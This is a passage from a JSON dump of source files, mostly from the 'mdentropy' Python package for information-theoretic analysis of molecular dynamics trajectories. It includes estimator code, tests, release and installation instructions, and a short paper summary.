# [0, 255] -> [0, 1]\n c = c.reshape((1, 1, self.width, self.height)) # [1, 1, W, H]\n\n return x, z, c\n" }, { "alpha_fraction": 0.6076233386993408, "alphanum_fraction": 0.6278026700019836, "avg_line_length": 25.235294342041016, "blob_id": "0af30a97ca35b287a96b85775e183c5e2678baf8", "content_id": "64845dc6aa9b67373f495eaafd0aaa8efb2ebc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 73, "num_lines": 17, "path": "/test/test_dataset.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom cppn.my_dataset import MyDataset\n\n\ndef test_get_example():\n width = 32\n height = 32\n z_size = 2\n paths = list(Path('./test/dammy_image_data').glob('*.jpg'))\n dataset = MyDataset(paths, width=width, height=height, z_size=z_size)\n\n x, z, c = dataset.get_example(0)\n\n assert x.shape == (width * height, 3)\n assert z.shape == (width * height, z_size)\n assert c.shape == (1, 1, width, height)\n" } ]
25
shozebhaider/mdentropy
https://github.com/shozebhaider/mdentropy
0e412efd1bf20d37dd8f64674f9170760f27a621
82d616ddffe11283052b2d870c3b0274736a173c
c20e0ed944f536626329fb4a1a25599e4d8bd6da
refs/heads/master
2020-05-25T17:09:28.122059
2018-01-17T06:12:18
2018-01-17T06:12:18
187,903,560
1
0
null
2019-05-21T19:48:48
2019-05-21T19:47:39
2018-01-17T06:12:18
null
[ { "alpha_fraction": 0.5543050169944763, "alphanum_fraction": 0.5603076219558716, "avg_line_length": 28.131147384643555, "blob_id": "bdf4e8d8bf290de59a0c6eb79231afbca8df9a6b", "content_id": "8544f630348ec147ad6dc96d5fb25ef117c494b5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5331, "license_type": "permissive", "max_line_length": 78, "num_lines": 183, "path": "/mdentropy/core/information.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .entropy import entropy, centropy\nfrom ..utils import avgdigamma, nearest_distances\n\nfrom numpy import (atleast_2d, diff, finfo, float32, hstack, nan_to_num, sqrt)\n\nfrom scipy.special import psi\n\n__all__ = ['mutinf', 'nmutinf', 'cmutinf', 'ncmutinf']\nEPS = finfo(float32).eps\n\n\ndef mutinf(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n if method == 'knn':\n return knn_mutinf(x, y, k=n_bins,\n boxsize=diff(rng).max() if rng else None)\n\n return (entropy(n_bins, [rng], method, x) +\n entropy(n_bins, [rng], method, y) -\n entropy(n_bins, 2 * [rng], method, x, y))\n\n\ndef knn_mutinf(x, y, k=None, boxsize=None):\n \"\"\"k-NN mutual information calculation\n\n Parameters\n ----------\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n k : int\n Number of bins.\n boxsize : float (or None)\n Wrap space between [0., boxsize)\n\n Returns\n -------\n mi : float\n \"\"\"\n data = hstack((x, y))\n\n k = k if k else max(3, 
int(data.shape[0] * 0.01))\n\n # Find nearest neighbors in joint space, p=inf means max-norm\n dvec = nearest_distances(data, k=k)\n a, b, c, d = (avgdigamma(atleast_2d(x).reshape(data.shape[0], -1), dvec),\n avgdigamma(atleast_2d(y).reshape(data.shape[0], -1), dvec),\n psi(k), psi(data.shape[0]))\n return max((-a - b + c + d), 0.)\n\n\ndef nmutinf(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Normalized mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Independent variable\n y : array_like, shape = (n_samples, n_dim)\n Independent variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n return nan_to_num(mutinf(n_bins, x, y, method=method, rng=rng) /\n sqrt(entropy(n_bins, [rng], method, x) *\n entropy(n_bins, [rng], method, y)))\n\n\ndef cmutinf(n_bins, x, y, z, rng=None, method='knn'):\n \"\"\"Conditional mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n if method == 'knn':\n return knn_cmutinf(x, y, z, k=n_bins,\n boxsize=diff(rng).max() if rng else None)\n\n return (centropy(n_bins, x, z, rng=rng, method=method) +\n entropy(n_bins, 2 * [rng], method, y, z) -\n entropy(n_bins, 3 * [rng], method, x, y, z))\n\n\ndef knn_cmutinf(x, y, z, k=None, boxsize=None):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n x : array_like, shape = (n_samples, n_dim)\n Conditioned 
variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n k : int\n Number of bins.\n boxsize : float (or None)\n Wrap space between [0., boxsize)\n\n Returns\n -------\n cmi : float\n \"\"\"\n data = hstack((x, y, z))\n\n k = k if k else max(3, int(data.shape[0] * 0.01))\n\n # Find nearest neighbors in joint space, p=inf means max-norm\n dvec = nearest_distances(data, k=k)\n a, b, c, d = (avgdigamma(hstack((x, z)), dvec),\n avgdigamma(hstack((y, z)), dvec),\n avgdigamma(atleast_2d(z).reshape(data.shape[0], -1), dvec),\n psi(k))\n return max((-a - b + c + d), 0.)\n\n\ndef ncmutinf(n_bins, x, y, z, rng=None, method='knn'):\n \"\"\"Normalized conditional mutual information calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n y : array_like, shape = (n_samples, n_dim)\n Conditioned variable\n z : array_like, shape = (n_samples, n_dim)\n Conditional variable\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n\n Returns\n -------\n ncmi : float\n \"\"\"\n return (cmutinf(n_bins, x, y, z, rng=rng, method=method) /\n centropy(n_bins, x, z, rng=rng, method=method))\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7176470756530762, "avg_line_length": 20.25, "blob_id": "fde38072bccee7525a7002adaee278f44fbb0b75", "content_id": "515cd5d9063cd1fb70c66c583eb858e2afb03314", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "permissive", "max_line_length": 40, "num_lines": 4, "path": "/mdentropy/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .core import *\n\nfrom .version import version as _version\n__version__ = _version\n" }, { "alpha_fraction": 
0.5973813533782959, "alphanum_fraction": 0.6288870573043823, "avg_line_length": 22.056604385375977, "blob_id": "b9afc47348cc1cef33a9c5f73be55e1301af89c7", "content_id": "522fda0e409a2427484c965ae00e84e72bf9f391", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2444, "license_type": "permissive", "max_line_length": 77, "num_lines": 106, "path": "/mdentropy/tests/test_mutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import entropy_gaussian\nfrom ..core import mutinf, nmutinf\nfrom ..metrics import (AlphaAngleMutualInformation, ContactMutualInformation,\n DihedralMutualInformation)\n\nfrom msmbuilder.example_datasets import FsPeptide\n\nimport numpy as np\nfrom numpy.testing import assert_almost_equal as eq, assert_allclose as close\n\n\nrs = np.random.RandomState(42)\nn = 50000\nP = np.array([[1, 0], [0.5, 1]])\nCOV = np.dot(P, P.T)\nU = rs.randn(2, n)\nX, Y = np.dot(P, U)\nX, Y = X.reshape(n, 1), Y.reshape(n, 1)\n\nTRUE_MUTINF = (entropy_gaussian(COV[0, 0]) + entropy_gaussian(COV[1, 1]) -\n entropy_gaussian(COV))\n\n\ndef test_mutinf_kde():\n close(mutinf(8, X, Y, method='kde'), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_knn():\n close(mutinf(3, X, Y, method='knn'), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_chaowangjost():\n close(mutinf(8, X, Y, method='chaowangjost'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_grassberger():\n close(mutinf(8, X, Y, method='grassberger'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_doanes_rule():\n close(mutinf(None, X, Y, method='grassberger'), TRUE_MUTINF, atol=.01,\n rtol=.2)\n\n\ndef test_mutinf_naive():\n close(mutinf(8, X, Y, method=None), TRUE_MUTINF, atol=.01, rtol=.2)\n\n\ndef test_mutinf_reversible():\n MI1 = mutinf(24, X, Y)\n MI2 = mutinf(24, Y, X)\n\n eq(MI1, MI2, 5)\n\n\ndef test_nmutinf_reversible():\n MI1 = nmutinf(24, X, Y)\n MI2 = nmutinf(24, Y, X)\n\n 
eq(MI1, MI2, 5)\n\n\ndef test_fs_mutinf():\n\n traj = FsPeptide().get().trajectories[0]\n\n idx = [at.index for at in traj.topology.atoms\n if at.residue.index in [3, 4, 5, 6, 7, 8]]\n traj = traj.atom_slice(atom_indices=idx)[::100]\n\n yield _test_mi_alpha, traj\n yield _test_mi_contact, traj\n yield _test_mi_dihedral, traj\n\n\ndef _test_mi_alpha(traj):\n mi = AlphaAngleMutualInformation()\n M = mi.partial_transform(traj)\n\n eq(M - M.T, 0)\n\n\ndef _test_mi_contact(traj):\n mi = ContactMutualInformation()\n M = mi.partial_transform(traj)\n\n eq(M - M.T, 0)\n\n\ndef _test_mi_dihedral(traj):\n mi = DihedralMutualInformation()\n M = mi.partial_transform(traj)\n\n eq(M - M.T, 0)\n _test_mi_shuffle(mi, traj)\n\n\ndef _test_mi_shuffle(mi, traj):\n M = mi.partial_transform(traj, shuffle=0)\n MS = mi.partial_transform(traj, shuffle=1)\n\n error = np.abs(M - MS).ravel()\n\n assert any(error > 1E-6)\n" }, { "alpha_fraction": 0.5727980732917786, "alphanum_fraction": 0.5755941867828369, "avg_line_length": 30.293750762939453, "blob_id": "0b311f2149ebe440b0677492e99f383d58fad5f2", "content_id": "fd963833b70c7f0015e0249138d585eefb83829f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5007, "license_type": "permissive", "max_line_length": 79, "num_lines": 160, "path": "/mdentropy/metrics/base.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import floor_threshold, Timing\nfrom ..utils import shuffle as shuffle_data\n\nfrom multiprocessing import cpu_count\n\nimport pandas as pd\nimport numpy as np\n\nfrom msmbuilder.featurizer import (AlphaAngleFeaturizer, ContactFeaturizer,\n DihedralFeaturizer)\n\n\nclass BaseMetric(object):\n\n \"\"\"Base metric object\"\"\"\n\n def _shuffle(self):\n self.shuffled_data = shuffle_data(self.shuffled_data)\n\n def _extract_data(self, traj):\n pass\n\n def _before_exec(self, traj):\n self.data = self._extract_data(traj)\n 
self.shuffled_data = self.data\n self.labels = np.unique(self.data.columns.levels[0])\n\n def _exec(self):\n pass\n\n def _floored_exec(self):\n return floor_threshold(self._exec())\n\n def partial_transform(self, traj, shuffle=0, verbose=False):\n \"\"\"Transform a single mdtraj.Trajectory into an array of metric scores.\n\n Parameters\n ----------\n traj : mdtraj.Trajectory\n Trajectory to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray\n Scoring matrix\n \"\"\"\n self._before_exec(traj)\n result = self._floored_exec()\n correction = np.zeros_like(result)\n for i in range(shuffle):\n with Timing(i, verbose=verbose):\n self._shuffle()\n correction += self._floored_exec()\n\n return floor_threshold(result - np.nan_to_num(correction / shuffle))\n\n def transform(self, trajs, shuffle=0, verbose=False):\n \"\"\"Invokes partial_transform over a list of mdtraj.Trajectory objects\n\n Parameters\n ----------\n trajs : list\n List of trajectories to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : array_like\n List of scoring matrices\n \"\"\"\n for traj in trajs:\n yield self.partial_transform(traj, shuffle=shuffle,\n verbose=verbose)\n\n def __init__(self, n_bins=3, rng=None, method='knn',\n threads=None):\n self.data = None\n self.shuffled_data = None\n self.labels = None\n self.n_bins = n_bins\n self.rng = rng\n self.method = method\n self.n_threads = threads or int(cpu_count() / 2)\n\n\nclass DihedralBaseMetric(BaseMetric):\n\n \"\"\"Base dihedral metric object\"\"\"\n\n def _featurizer(self, **kwargs):\n return DihedralFeaturizer(sincos=False, **kwargs)\n\n def _extract_data(self, traj):\n data = []\n for tp in self.types:\n featurizer = self._featurizer(types=[tp])\n angles = featurizer.partial_transform(traj)\n summary = 
featurizer.describe_features(traj)\n idx = [[traj.topology.atom(ati).residue.index\n for ati in item['atominds']][1] for item in summary]\n data.append(pd.DataFrame((angles + np.pi) % (2. * np.pi),\n columns=[idx, len(idx) * [tp]]))\n return pd.concat(data, axis=1)\n\n def __init__(self, types=None, rng=None, **kwargs):\n self.types = types or ['phi', 'psi']\n self.rng = rng or [0., 2 * np.pi]\n\n super(DihedralBaseMetric, self).__init__(**kwargs)\n\n\nclass AlphaAngleBaseMetric(DihedralBaseMetric):\n\n \"\"\"Base alpha angle metric object\"\"\"\n\n def _featurizer(self, **kwargs):\n return AlphaAngleFeaturizer(sincos=False)\n\n def __init__(self, **kwargs):\n self.types = ['alpha']\n\n super(AlphaAngleBaseMetric, self).__init__(**kwargs)\n\n\nclass ContactBaseMetric(BaseMetric):\n\n \"\"\"Base contact metric object\"\"\"\n\n def _extract_data(self, traj):\n contact = ContactFeaturizer(contacts=self.contacts, scheme=self.scheme,\n ignore_nonprotein=self.ignore_nonprotein)\n distances = contact.partial_transform(traj)\n summary = contact.describe_features(traj)\n pairs = [item['resids'] for item in summary]\n resids = np.unique(pairs)\n data = []\n for resid in resids:\n idx = list(list(set(pair) - {resid})[0]\n for pair in pairs if resid in pair)\n mapping = np.array([True if resid in pair else False\n for pair in pairs])\n data.append(pd.DataFrame(distances[:, mapping],\n columns=[idx, len(idx) * [resid]]))\n\n return pd.concat(data, axis=1)\n\n def __init__(self, contacts='all', scheme='closest-heavy',\n ignore_nonprotein=True, **kwargs):\n self.contacts = contacts\n self.scheme = scheme\n self.ignore_nonprotein = ignore_nonprotein\n\n super(ContactBaseMetric, self).__init__(**kwargs)\n" }, { "alpha_fraction": 0.6120981574058533, "alphanum_fraction": 0.6129441857337952, "avg_line_length": 29.701297760009766, "blob_id": "8c79464ccd45fc8e79ab829d11c7a5dad0794cda", "content_id": "855e581476921ae57d4de787a871b5c54e8f3477", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2364, "license_type": "permissive", "max_line_length": 79, "num_lines": 77, "path": "/mdentropy/metrics/mutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..core import mutinf, nmutinf\nfrom .base import (AlphaAngleBaseMetric, ContactBaseMetric, DihedralBaseMetric,\n BaseMetric)\n\nimport numpy as np\nfrom itertools import combinations_with_replacement as combinations\n\nfrom multiprocessing import Pool\nfrom contextlib import closing\n\n__all__ = ['AlphaAngleMutualInformation', 'ContactMutualInformation',\n 'DihedralMutualInformation']\n\n\nclass MutualInformationBase(BaseMetric):\n\n \"\"\"Base mutual information object\"\"\"\n\n def _partial_mutinf(self, p):\n i, j = p\n\n return self._est(self.n_bins,\n self.data[i].values,\n self.shuffled_data[j].values,\n rng=self.rng,\n method=self.method)\n\n def _exec(self):\n M = np.zeros((self.labels.size, self.labels.size))\n\n with closing(Pool(processes=self.n_threads)) as pool:\n values = pool.map(self._partial_mutinf,\n combinations(self.labels, 2))\n pool.terminate()\n\n idx = np.triu_indices_from(M)\n M[idx] = values\n\n return M + M.T - np.diag(M.diagonal())\n\n def __init__(self, normed=True, **kwargs):\n self._est = nmutinf if normed else mutinf\n self.partial_transform.__func__.__doc__ = \"\"\"\n Partial transform a mdtraj.Trajectory into an n_residue by n_residue\n matrix of mutual information scores.\n\n Parameters\n ----------\n traj : mdtraj.Trajectory\n Trajectory to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray, shape = (n_residue, n_residue)\n Mutual information matrix\n \"\"\"\n\n super(MutualInformationBase, self).__init__(**kwargs)\n\n\nclass AlphaAngleMutualInformation(AlphaAngleBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for alpha 
angles\"\"\"\n\n\nclass ContactMutualInformation(ContactBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for contacts\"\"\"\n\n\nclass DihedralMutualInformation(DihedralBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for dihedral angles\"\"\"\n" }, { "alpha_fraction": 0.7374892234802246, "alphanum_fraction": 0.7441760301589966, "avg_line_length": 42.32710266113281, "blob_id": "9a621c2041b062a72123043d43e493ff90f52553", "content_id": "cdadecd72cd7f9de4f6dd410d93087db7fb41d68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4636, "license_type": "permissive", "max_line_length": 103, "num_lines": 107, "path": "/devtools/README.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "How to release\n===================\n\nPre-release + Github\n--------------------\n- Update the `docs/whatsnew.rst` document. Use the github view that shows all the\n commits to master since the last release to write it\n * You can also try using [this tool](https://github.com/rmcgibbo/gh-util), which should list all\n of the PRs that have been merged since the laster release.\n- Update the version number in `devtools/conda-recipe/meta.yaml`\n- Commit to master, and tag the\n release on github.\n- Run git pull to pull the newly created tag locally. 
Versioneer depends on\n this to get the version string right.\n\nPyPI\n----\nThe next step is to add the release to the python package index.\n\n- Git pull, and make sure it pulls the recent tag.\n- Run `git clean -fdx` to clean the source directory.\n- Create the cannoncal \"sdist\" (source distribution) using `python setup.py sdist --formats=gztar,zip`.\n You ran git clean, right?\n- Inspect the sdist files (they're placed in `dist/`), and make sure they look right.\n You can try installing them into your environment with pip, unzipping or untaring them, etc.\n- Once you're satisfied that the sdist is correct, push the source to PyPI using\n `twine upload [path to sdist files]`. This requires being registered on PyPI as a owner or maintainer\n of the project.\n\nImmediately after creating the sdist\n------------------------------------\n- Update the version number in `devtools/conda-recipy/meta.yaml`\n to `1.(x+1).0.dev0` per PEP440.\n- Add a new section in `docs/whatsnew.rst` and mark it \"(Development)\".\n- Commit to master.\n\nConda\n-----\n- File a PR against [omnia-md/conda-recipes](https://github.com/omnia-md/conda-recipes) that\n updates the recipe's version string and source URL to pull the new sdist from PyPI. Travis\n and Appveyor will then build binary conda packages.\n\nWheels\n------\n\nPyPI hosts *wheels*, pre-compiled binary packages, like conda packages, for OS X and\nWindows. (At the time of this writing, they are still ironing out issues w.r.t.\nlinux.) 
To create and upload wheels, download the sdist and unpack the (or check out\nthe exact tag from git), and run `python setup.py bdist_wheel`.\n\nFor example, to build wheels for Python 2.7, 3.4 and 3.5 on OS X, I ran\n```\nconda env remove -y -n _build\nversions=(\"2.7\" \"3.4\" \"3.5\")\nfor v in \"${versions[@]}\"; do\n conda create -y -n _build python=$v numpy cython\n source activate _build\n python setup.py bdist_wheel\n source deactivate\n conda env remove -y -n _build\ndone\n```\nThen, if these all look good, you can upload them to PyPI with twine, as was done with the\nsdist.\n\n\nDocs Building & Hosting\n=======================\n\nAfter a travis build succeeds, the docs are built with sphinx and pushed to\nthe msmbuilder.org amazon s3 account in the mdentropy/ subdirectory.\nThe credentials for that account are stored,\nencrypted, in the .travis.yml file.\n\nMultiple versions of the docs are hosted\nonline. When a build happens on a version with ISRELEASED==False, it's put into\nthe \"development\" folder on the S3 bucket. If ISRELEASED==True, it's put into a\nsubfolder with the name of the short release. The relevant logic is in\n`devtools/travis-ci/set_doc_version.py`.\n\n\nTools License\n=============\nCopyright (c) 2012-2016 Stanford University and the Authors\nAll rights reserved.\n\nRedistribution and use of all files in this folder (devtools) and (../.travis.yml,\n../basesetup.py, ../setup.py) files in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n2. 
Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n" }, { "alpha_fraction": 0.6681581139564514, "alphanum_fraction": 0.6830723285675049, "avg_line_length": 20.285715103149414, "blob_id": "d7324338baee6dff8a4bc7c6939663b85e7952e5", "content_id": "03c4cfc3d6539dd06cb75680b380effeda867e28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1341, "license_type": "permissive", "max_line_length": 73, "num_lines": 63, "path": "/docs/installation.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "Installation\n============\n\nMDEntropy is written in Python, and can be installed with standard Python\nmachinery; although, we highly recommend using an\n`Anaconda Python distribution <https://www.continuum.io/downloads>`_.\n\n\nRelease Version\n---------------\n\n\nWith Anaconda, installation is as easy as:\n\n.. code-block:: bash\n\n $ conda install -c omnia mdentropy\n\nYou can also install mdentropy with `pip`:\n\n.. 
code-block:: bash\n\n $ pip install mdentropy\n\nAlternatively, you can install directly our\n`GitHub repository <https://github.com/msmbuilder/mdentropy>`_.:\n\n.. code-block:: bash\n\n $ git clone https://github.com/msmbuilder/mdentropy.git\n $ cd mdentropy && git checkout v0.3.0\n $ python setup.py install\n\n\nDevelopment Version\n-------------------\n\nTo grab the latest version from github, run:\n\n.. code-block:: bash\n\n $ pip install git+git://github.com/pandegroup/mdentropy.git\n\nOr clone the repo yourself and run `setup.py`:\n\n.. code-block:: bash\n\n $ git clone https://github.com/pandegroup/mdentropy.git\n $ cd mdentropy && python setup.py install\n\n\nDependencies\n------------\n- ``python>=3.4``\n- ``numpy>=1.10.4``\n- ``scipy>=0.17.0``\n- ``scikit-learn>=0.17.0``\n- ``msmbuilder>=3.5.0``\n- ``nose`` (optional, for testing)\n\nYou can grab most of them with conda. ::\n\n $ conda install -c omnia scipy numpy scikit-learn msmbuilder nose\n" }, { "alpha_fraction": 0.7219451665878296, "alphanum_fraction": 0.7256857752799988, "avg_line_length": 23.303030014038086, "blob_id": "a67bcec53968aa5b8aed6071f83d1ca06a450ce7", "content_id": "d1378f7f6ec94aad456f3f5f8ce7e403d3de24bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 802, "license_type": "permissive", "max_line_length": 139, "num_lines": 33, "path": "/docs/examples/index.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. _examples:\n\nExamples\n========\n\nThe following examples show off various aspects or capabilities of\nMDEntropy. They can be run interactively in Jupyter (IPython) notebook.\nDownload the `notebook files\n<https://github.com/msmbuilder/mdentropy/tree/master/examples>`_ and open\nthem in Jupyter::\n\n $ jupyter notebook\n\n.. To make the ipython rendered images show up, each rst file must be\n in its own directory.\n\n.. 
toctree::\n :maxdepth: 2\n :titlesonly:\n\n mutual-information\n\n\nPlease note that additional requirement for these notebooks inclue the latest versions of ``matplotlib``, ``nglview``, and ``msmexplorer``.\n\n\nContributing examples\n---------------------\n\nDo you have a neat example of using MDEntropy? Format your code\ninto an IPython notebook and submit a pull request!\n\n.. vim: tw=75\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "1d673afda56e844fa12095c1d96f41d533a9d78c", "content_id": "cac3680cdab9bf4f64bd5053b80e42ce8464ae65", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "permissive", "max_line_length": 21, "num_lines": 2, "path": "/mdentropy/metrics/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .mutinf import *\nfrom .tent import *\n" }, { "alpha_fraction": 0.7484884858131409, "alphanum_fraction": 0.7708585262298584, "avg_line_length": 34.956520080566406, "blob_id": "7f04535507995634093a48d323a2b52ff1c5b49f", "content_id": "917f6cdde2fe0a08ba2869e0a889279361d4bfe9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1654, "license_type": "permissive", "max_line_length": 79, "num_lines": 46, "path": "/paper/paper.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "---\ntitle: 'MDEntropy: Information-Theoretic Analyses for Molecular Dynamics'\ntags:\n - Python\n - information theory\n - molecular dynamics\n - time-series\nauthors:\n - name: Carlos X. Hernández\n orcid: 0000-0002-8146-5904\n affiliation: 1\n - name: Vijay S. 
Pande\n affiliation: 1\naffiliations:\n - name: Stanford University\n index: 1\ndate: 1 October 2017\nbibliography: paper.bib\nrepository: https://github.com/msmbuilder/mdentropy\narchive_doi: https://doi.org/10.5281/zenodo.1000997\n---\n\n\n# Summary\n\n*MDEntropy* is a Python package for information-theoretic (IT) analysis of data\ngenerated from molecular dynamics simulations. While correlation studies\nhave long been of interest to the molecular dynamics (MD) community\n[@mccammon, @mcclendon], IT tools to analyze MD trajectories have been much\nless developed. *MDEntropy* seeks to fill this niche by providing an\neasy-to-use Python API that works seamlessly with other Python packages, such\nas ``mdtraj``, ``msmbuilder``, and ``numpy`` [@mdtraj, @numpy, @msmbuilder].\n\nFunctionality in *MDEntropy* is centered around ``mdtraj`` trajectories and the\nstatistical tools available in ``msmbuilder``. Leveraging these tools allows\nfor statistically robust analyses of many IT estimators across a variety of\nbiomolecular feature-spaces [@schreiber, @grassberger].\n\n*MDEntropy* is actively developed and maintained by researchers at Stanford\nUniversity. Source code for *MDEntropy* is hosted on GitHub and is\ncontinuously archived to Zenodo [@mdent_archive]. 
Full documentation, including\nJupyter Notebook tutorials, can be found at\n[http://msmbuilder.org/mdentropy](http://msmbuilder.org/mdentropy).\n\n\n# References\n" }, { "alpha_fraction": 0.6778350472450256, "alphanum_fraction": 0.6778350472450256, "avg_line_length": 19.421052932739258, "blob_id": "72a87278b0f5360745f8674cd7cfa8f3c4d107c9", "content_id": "a51430a9b2f76bfe2653a040f439af42b8f593ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "permissive", "max_line_length": 51, "num_lines": 19, "path": "/mdentropy/tests/test_cli.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "import subprocess\nfrom distutils.spawn import find_executable\n\nMDENT = find_executable('mdent')\n\n\ndef test_mdent():\n assert MDENT is not None\n subprocess.check_call([MDENT, '-h'])\n\n\ndef test_dmutinf():\n assert MDENT is not None\n subprocess.check_call([MDENT, 'dmutinf', '-h'])\n\n\ndef test_dtent():\n assert MDENT is not None\n subprocess.check_call([MDENT, 'dtent', '-h'])\n" }, { "alpha_fraction": 0.5955983400344849, "alphanum_fraction": 0.6396148800849915, "avg_line_length": 21.030303955078125, "blob_id": "31ab6129eaa8fd500d5db200ca35675c5e0aec75", "content_id": "26dcf201799718262d9e874ac97e10adb26b49c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 727, "license_type": "permissive", "max_line_length": 52, "num_lines": 33, "path": "/docs/changelog.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. 
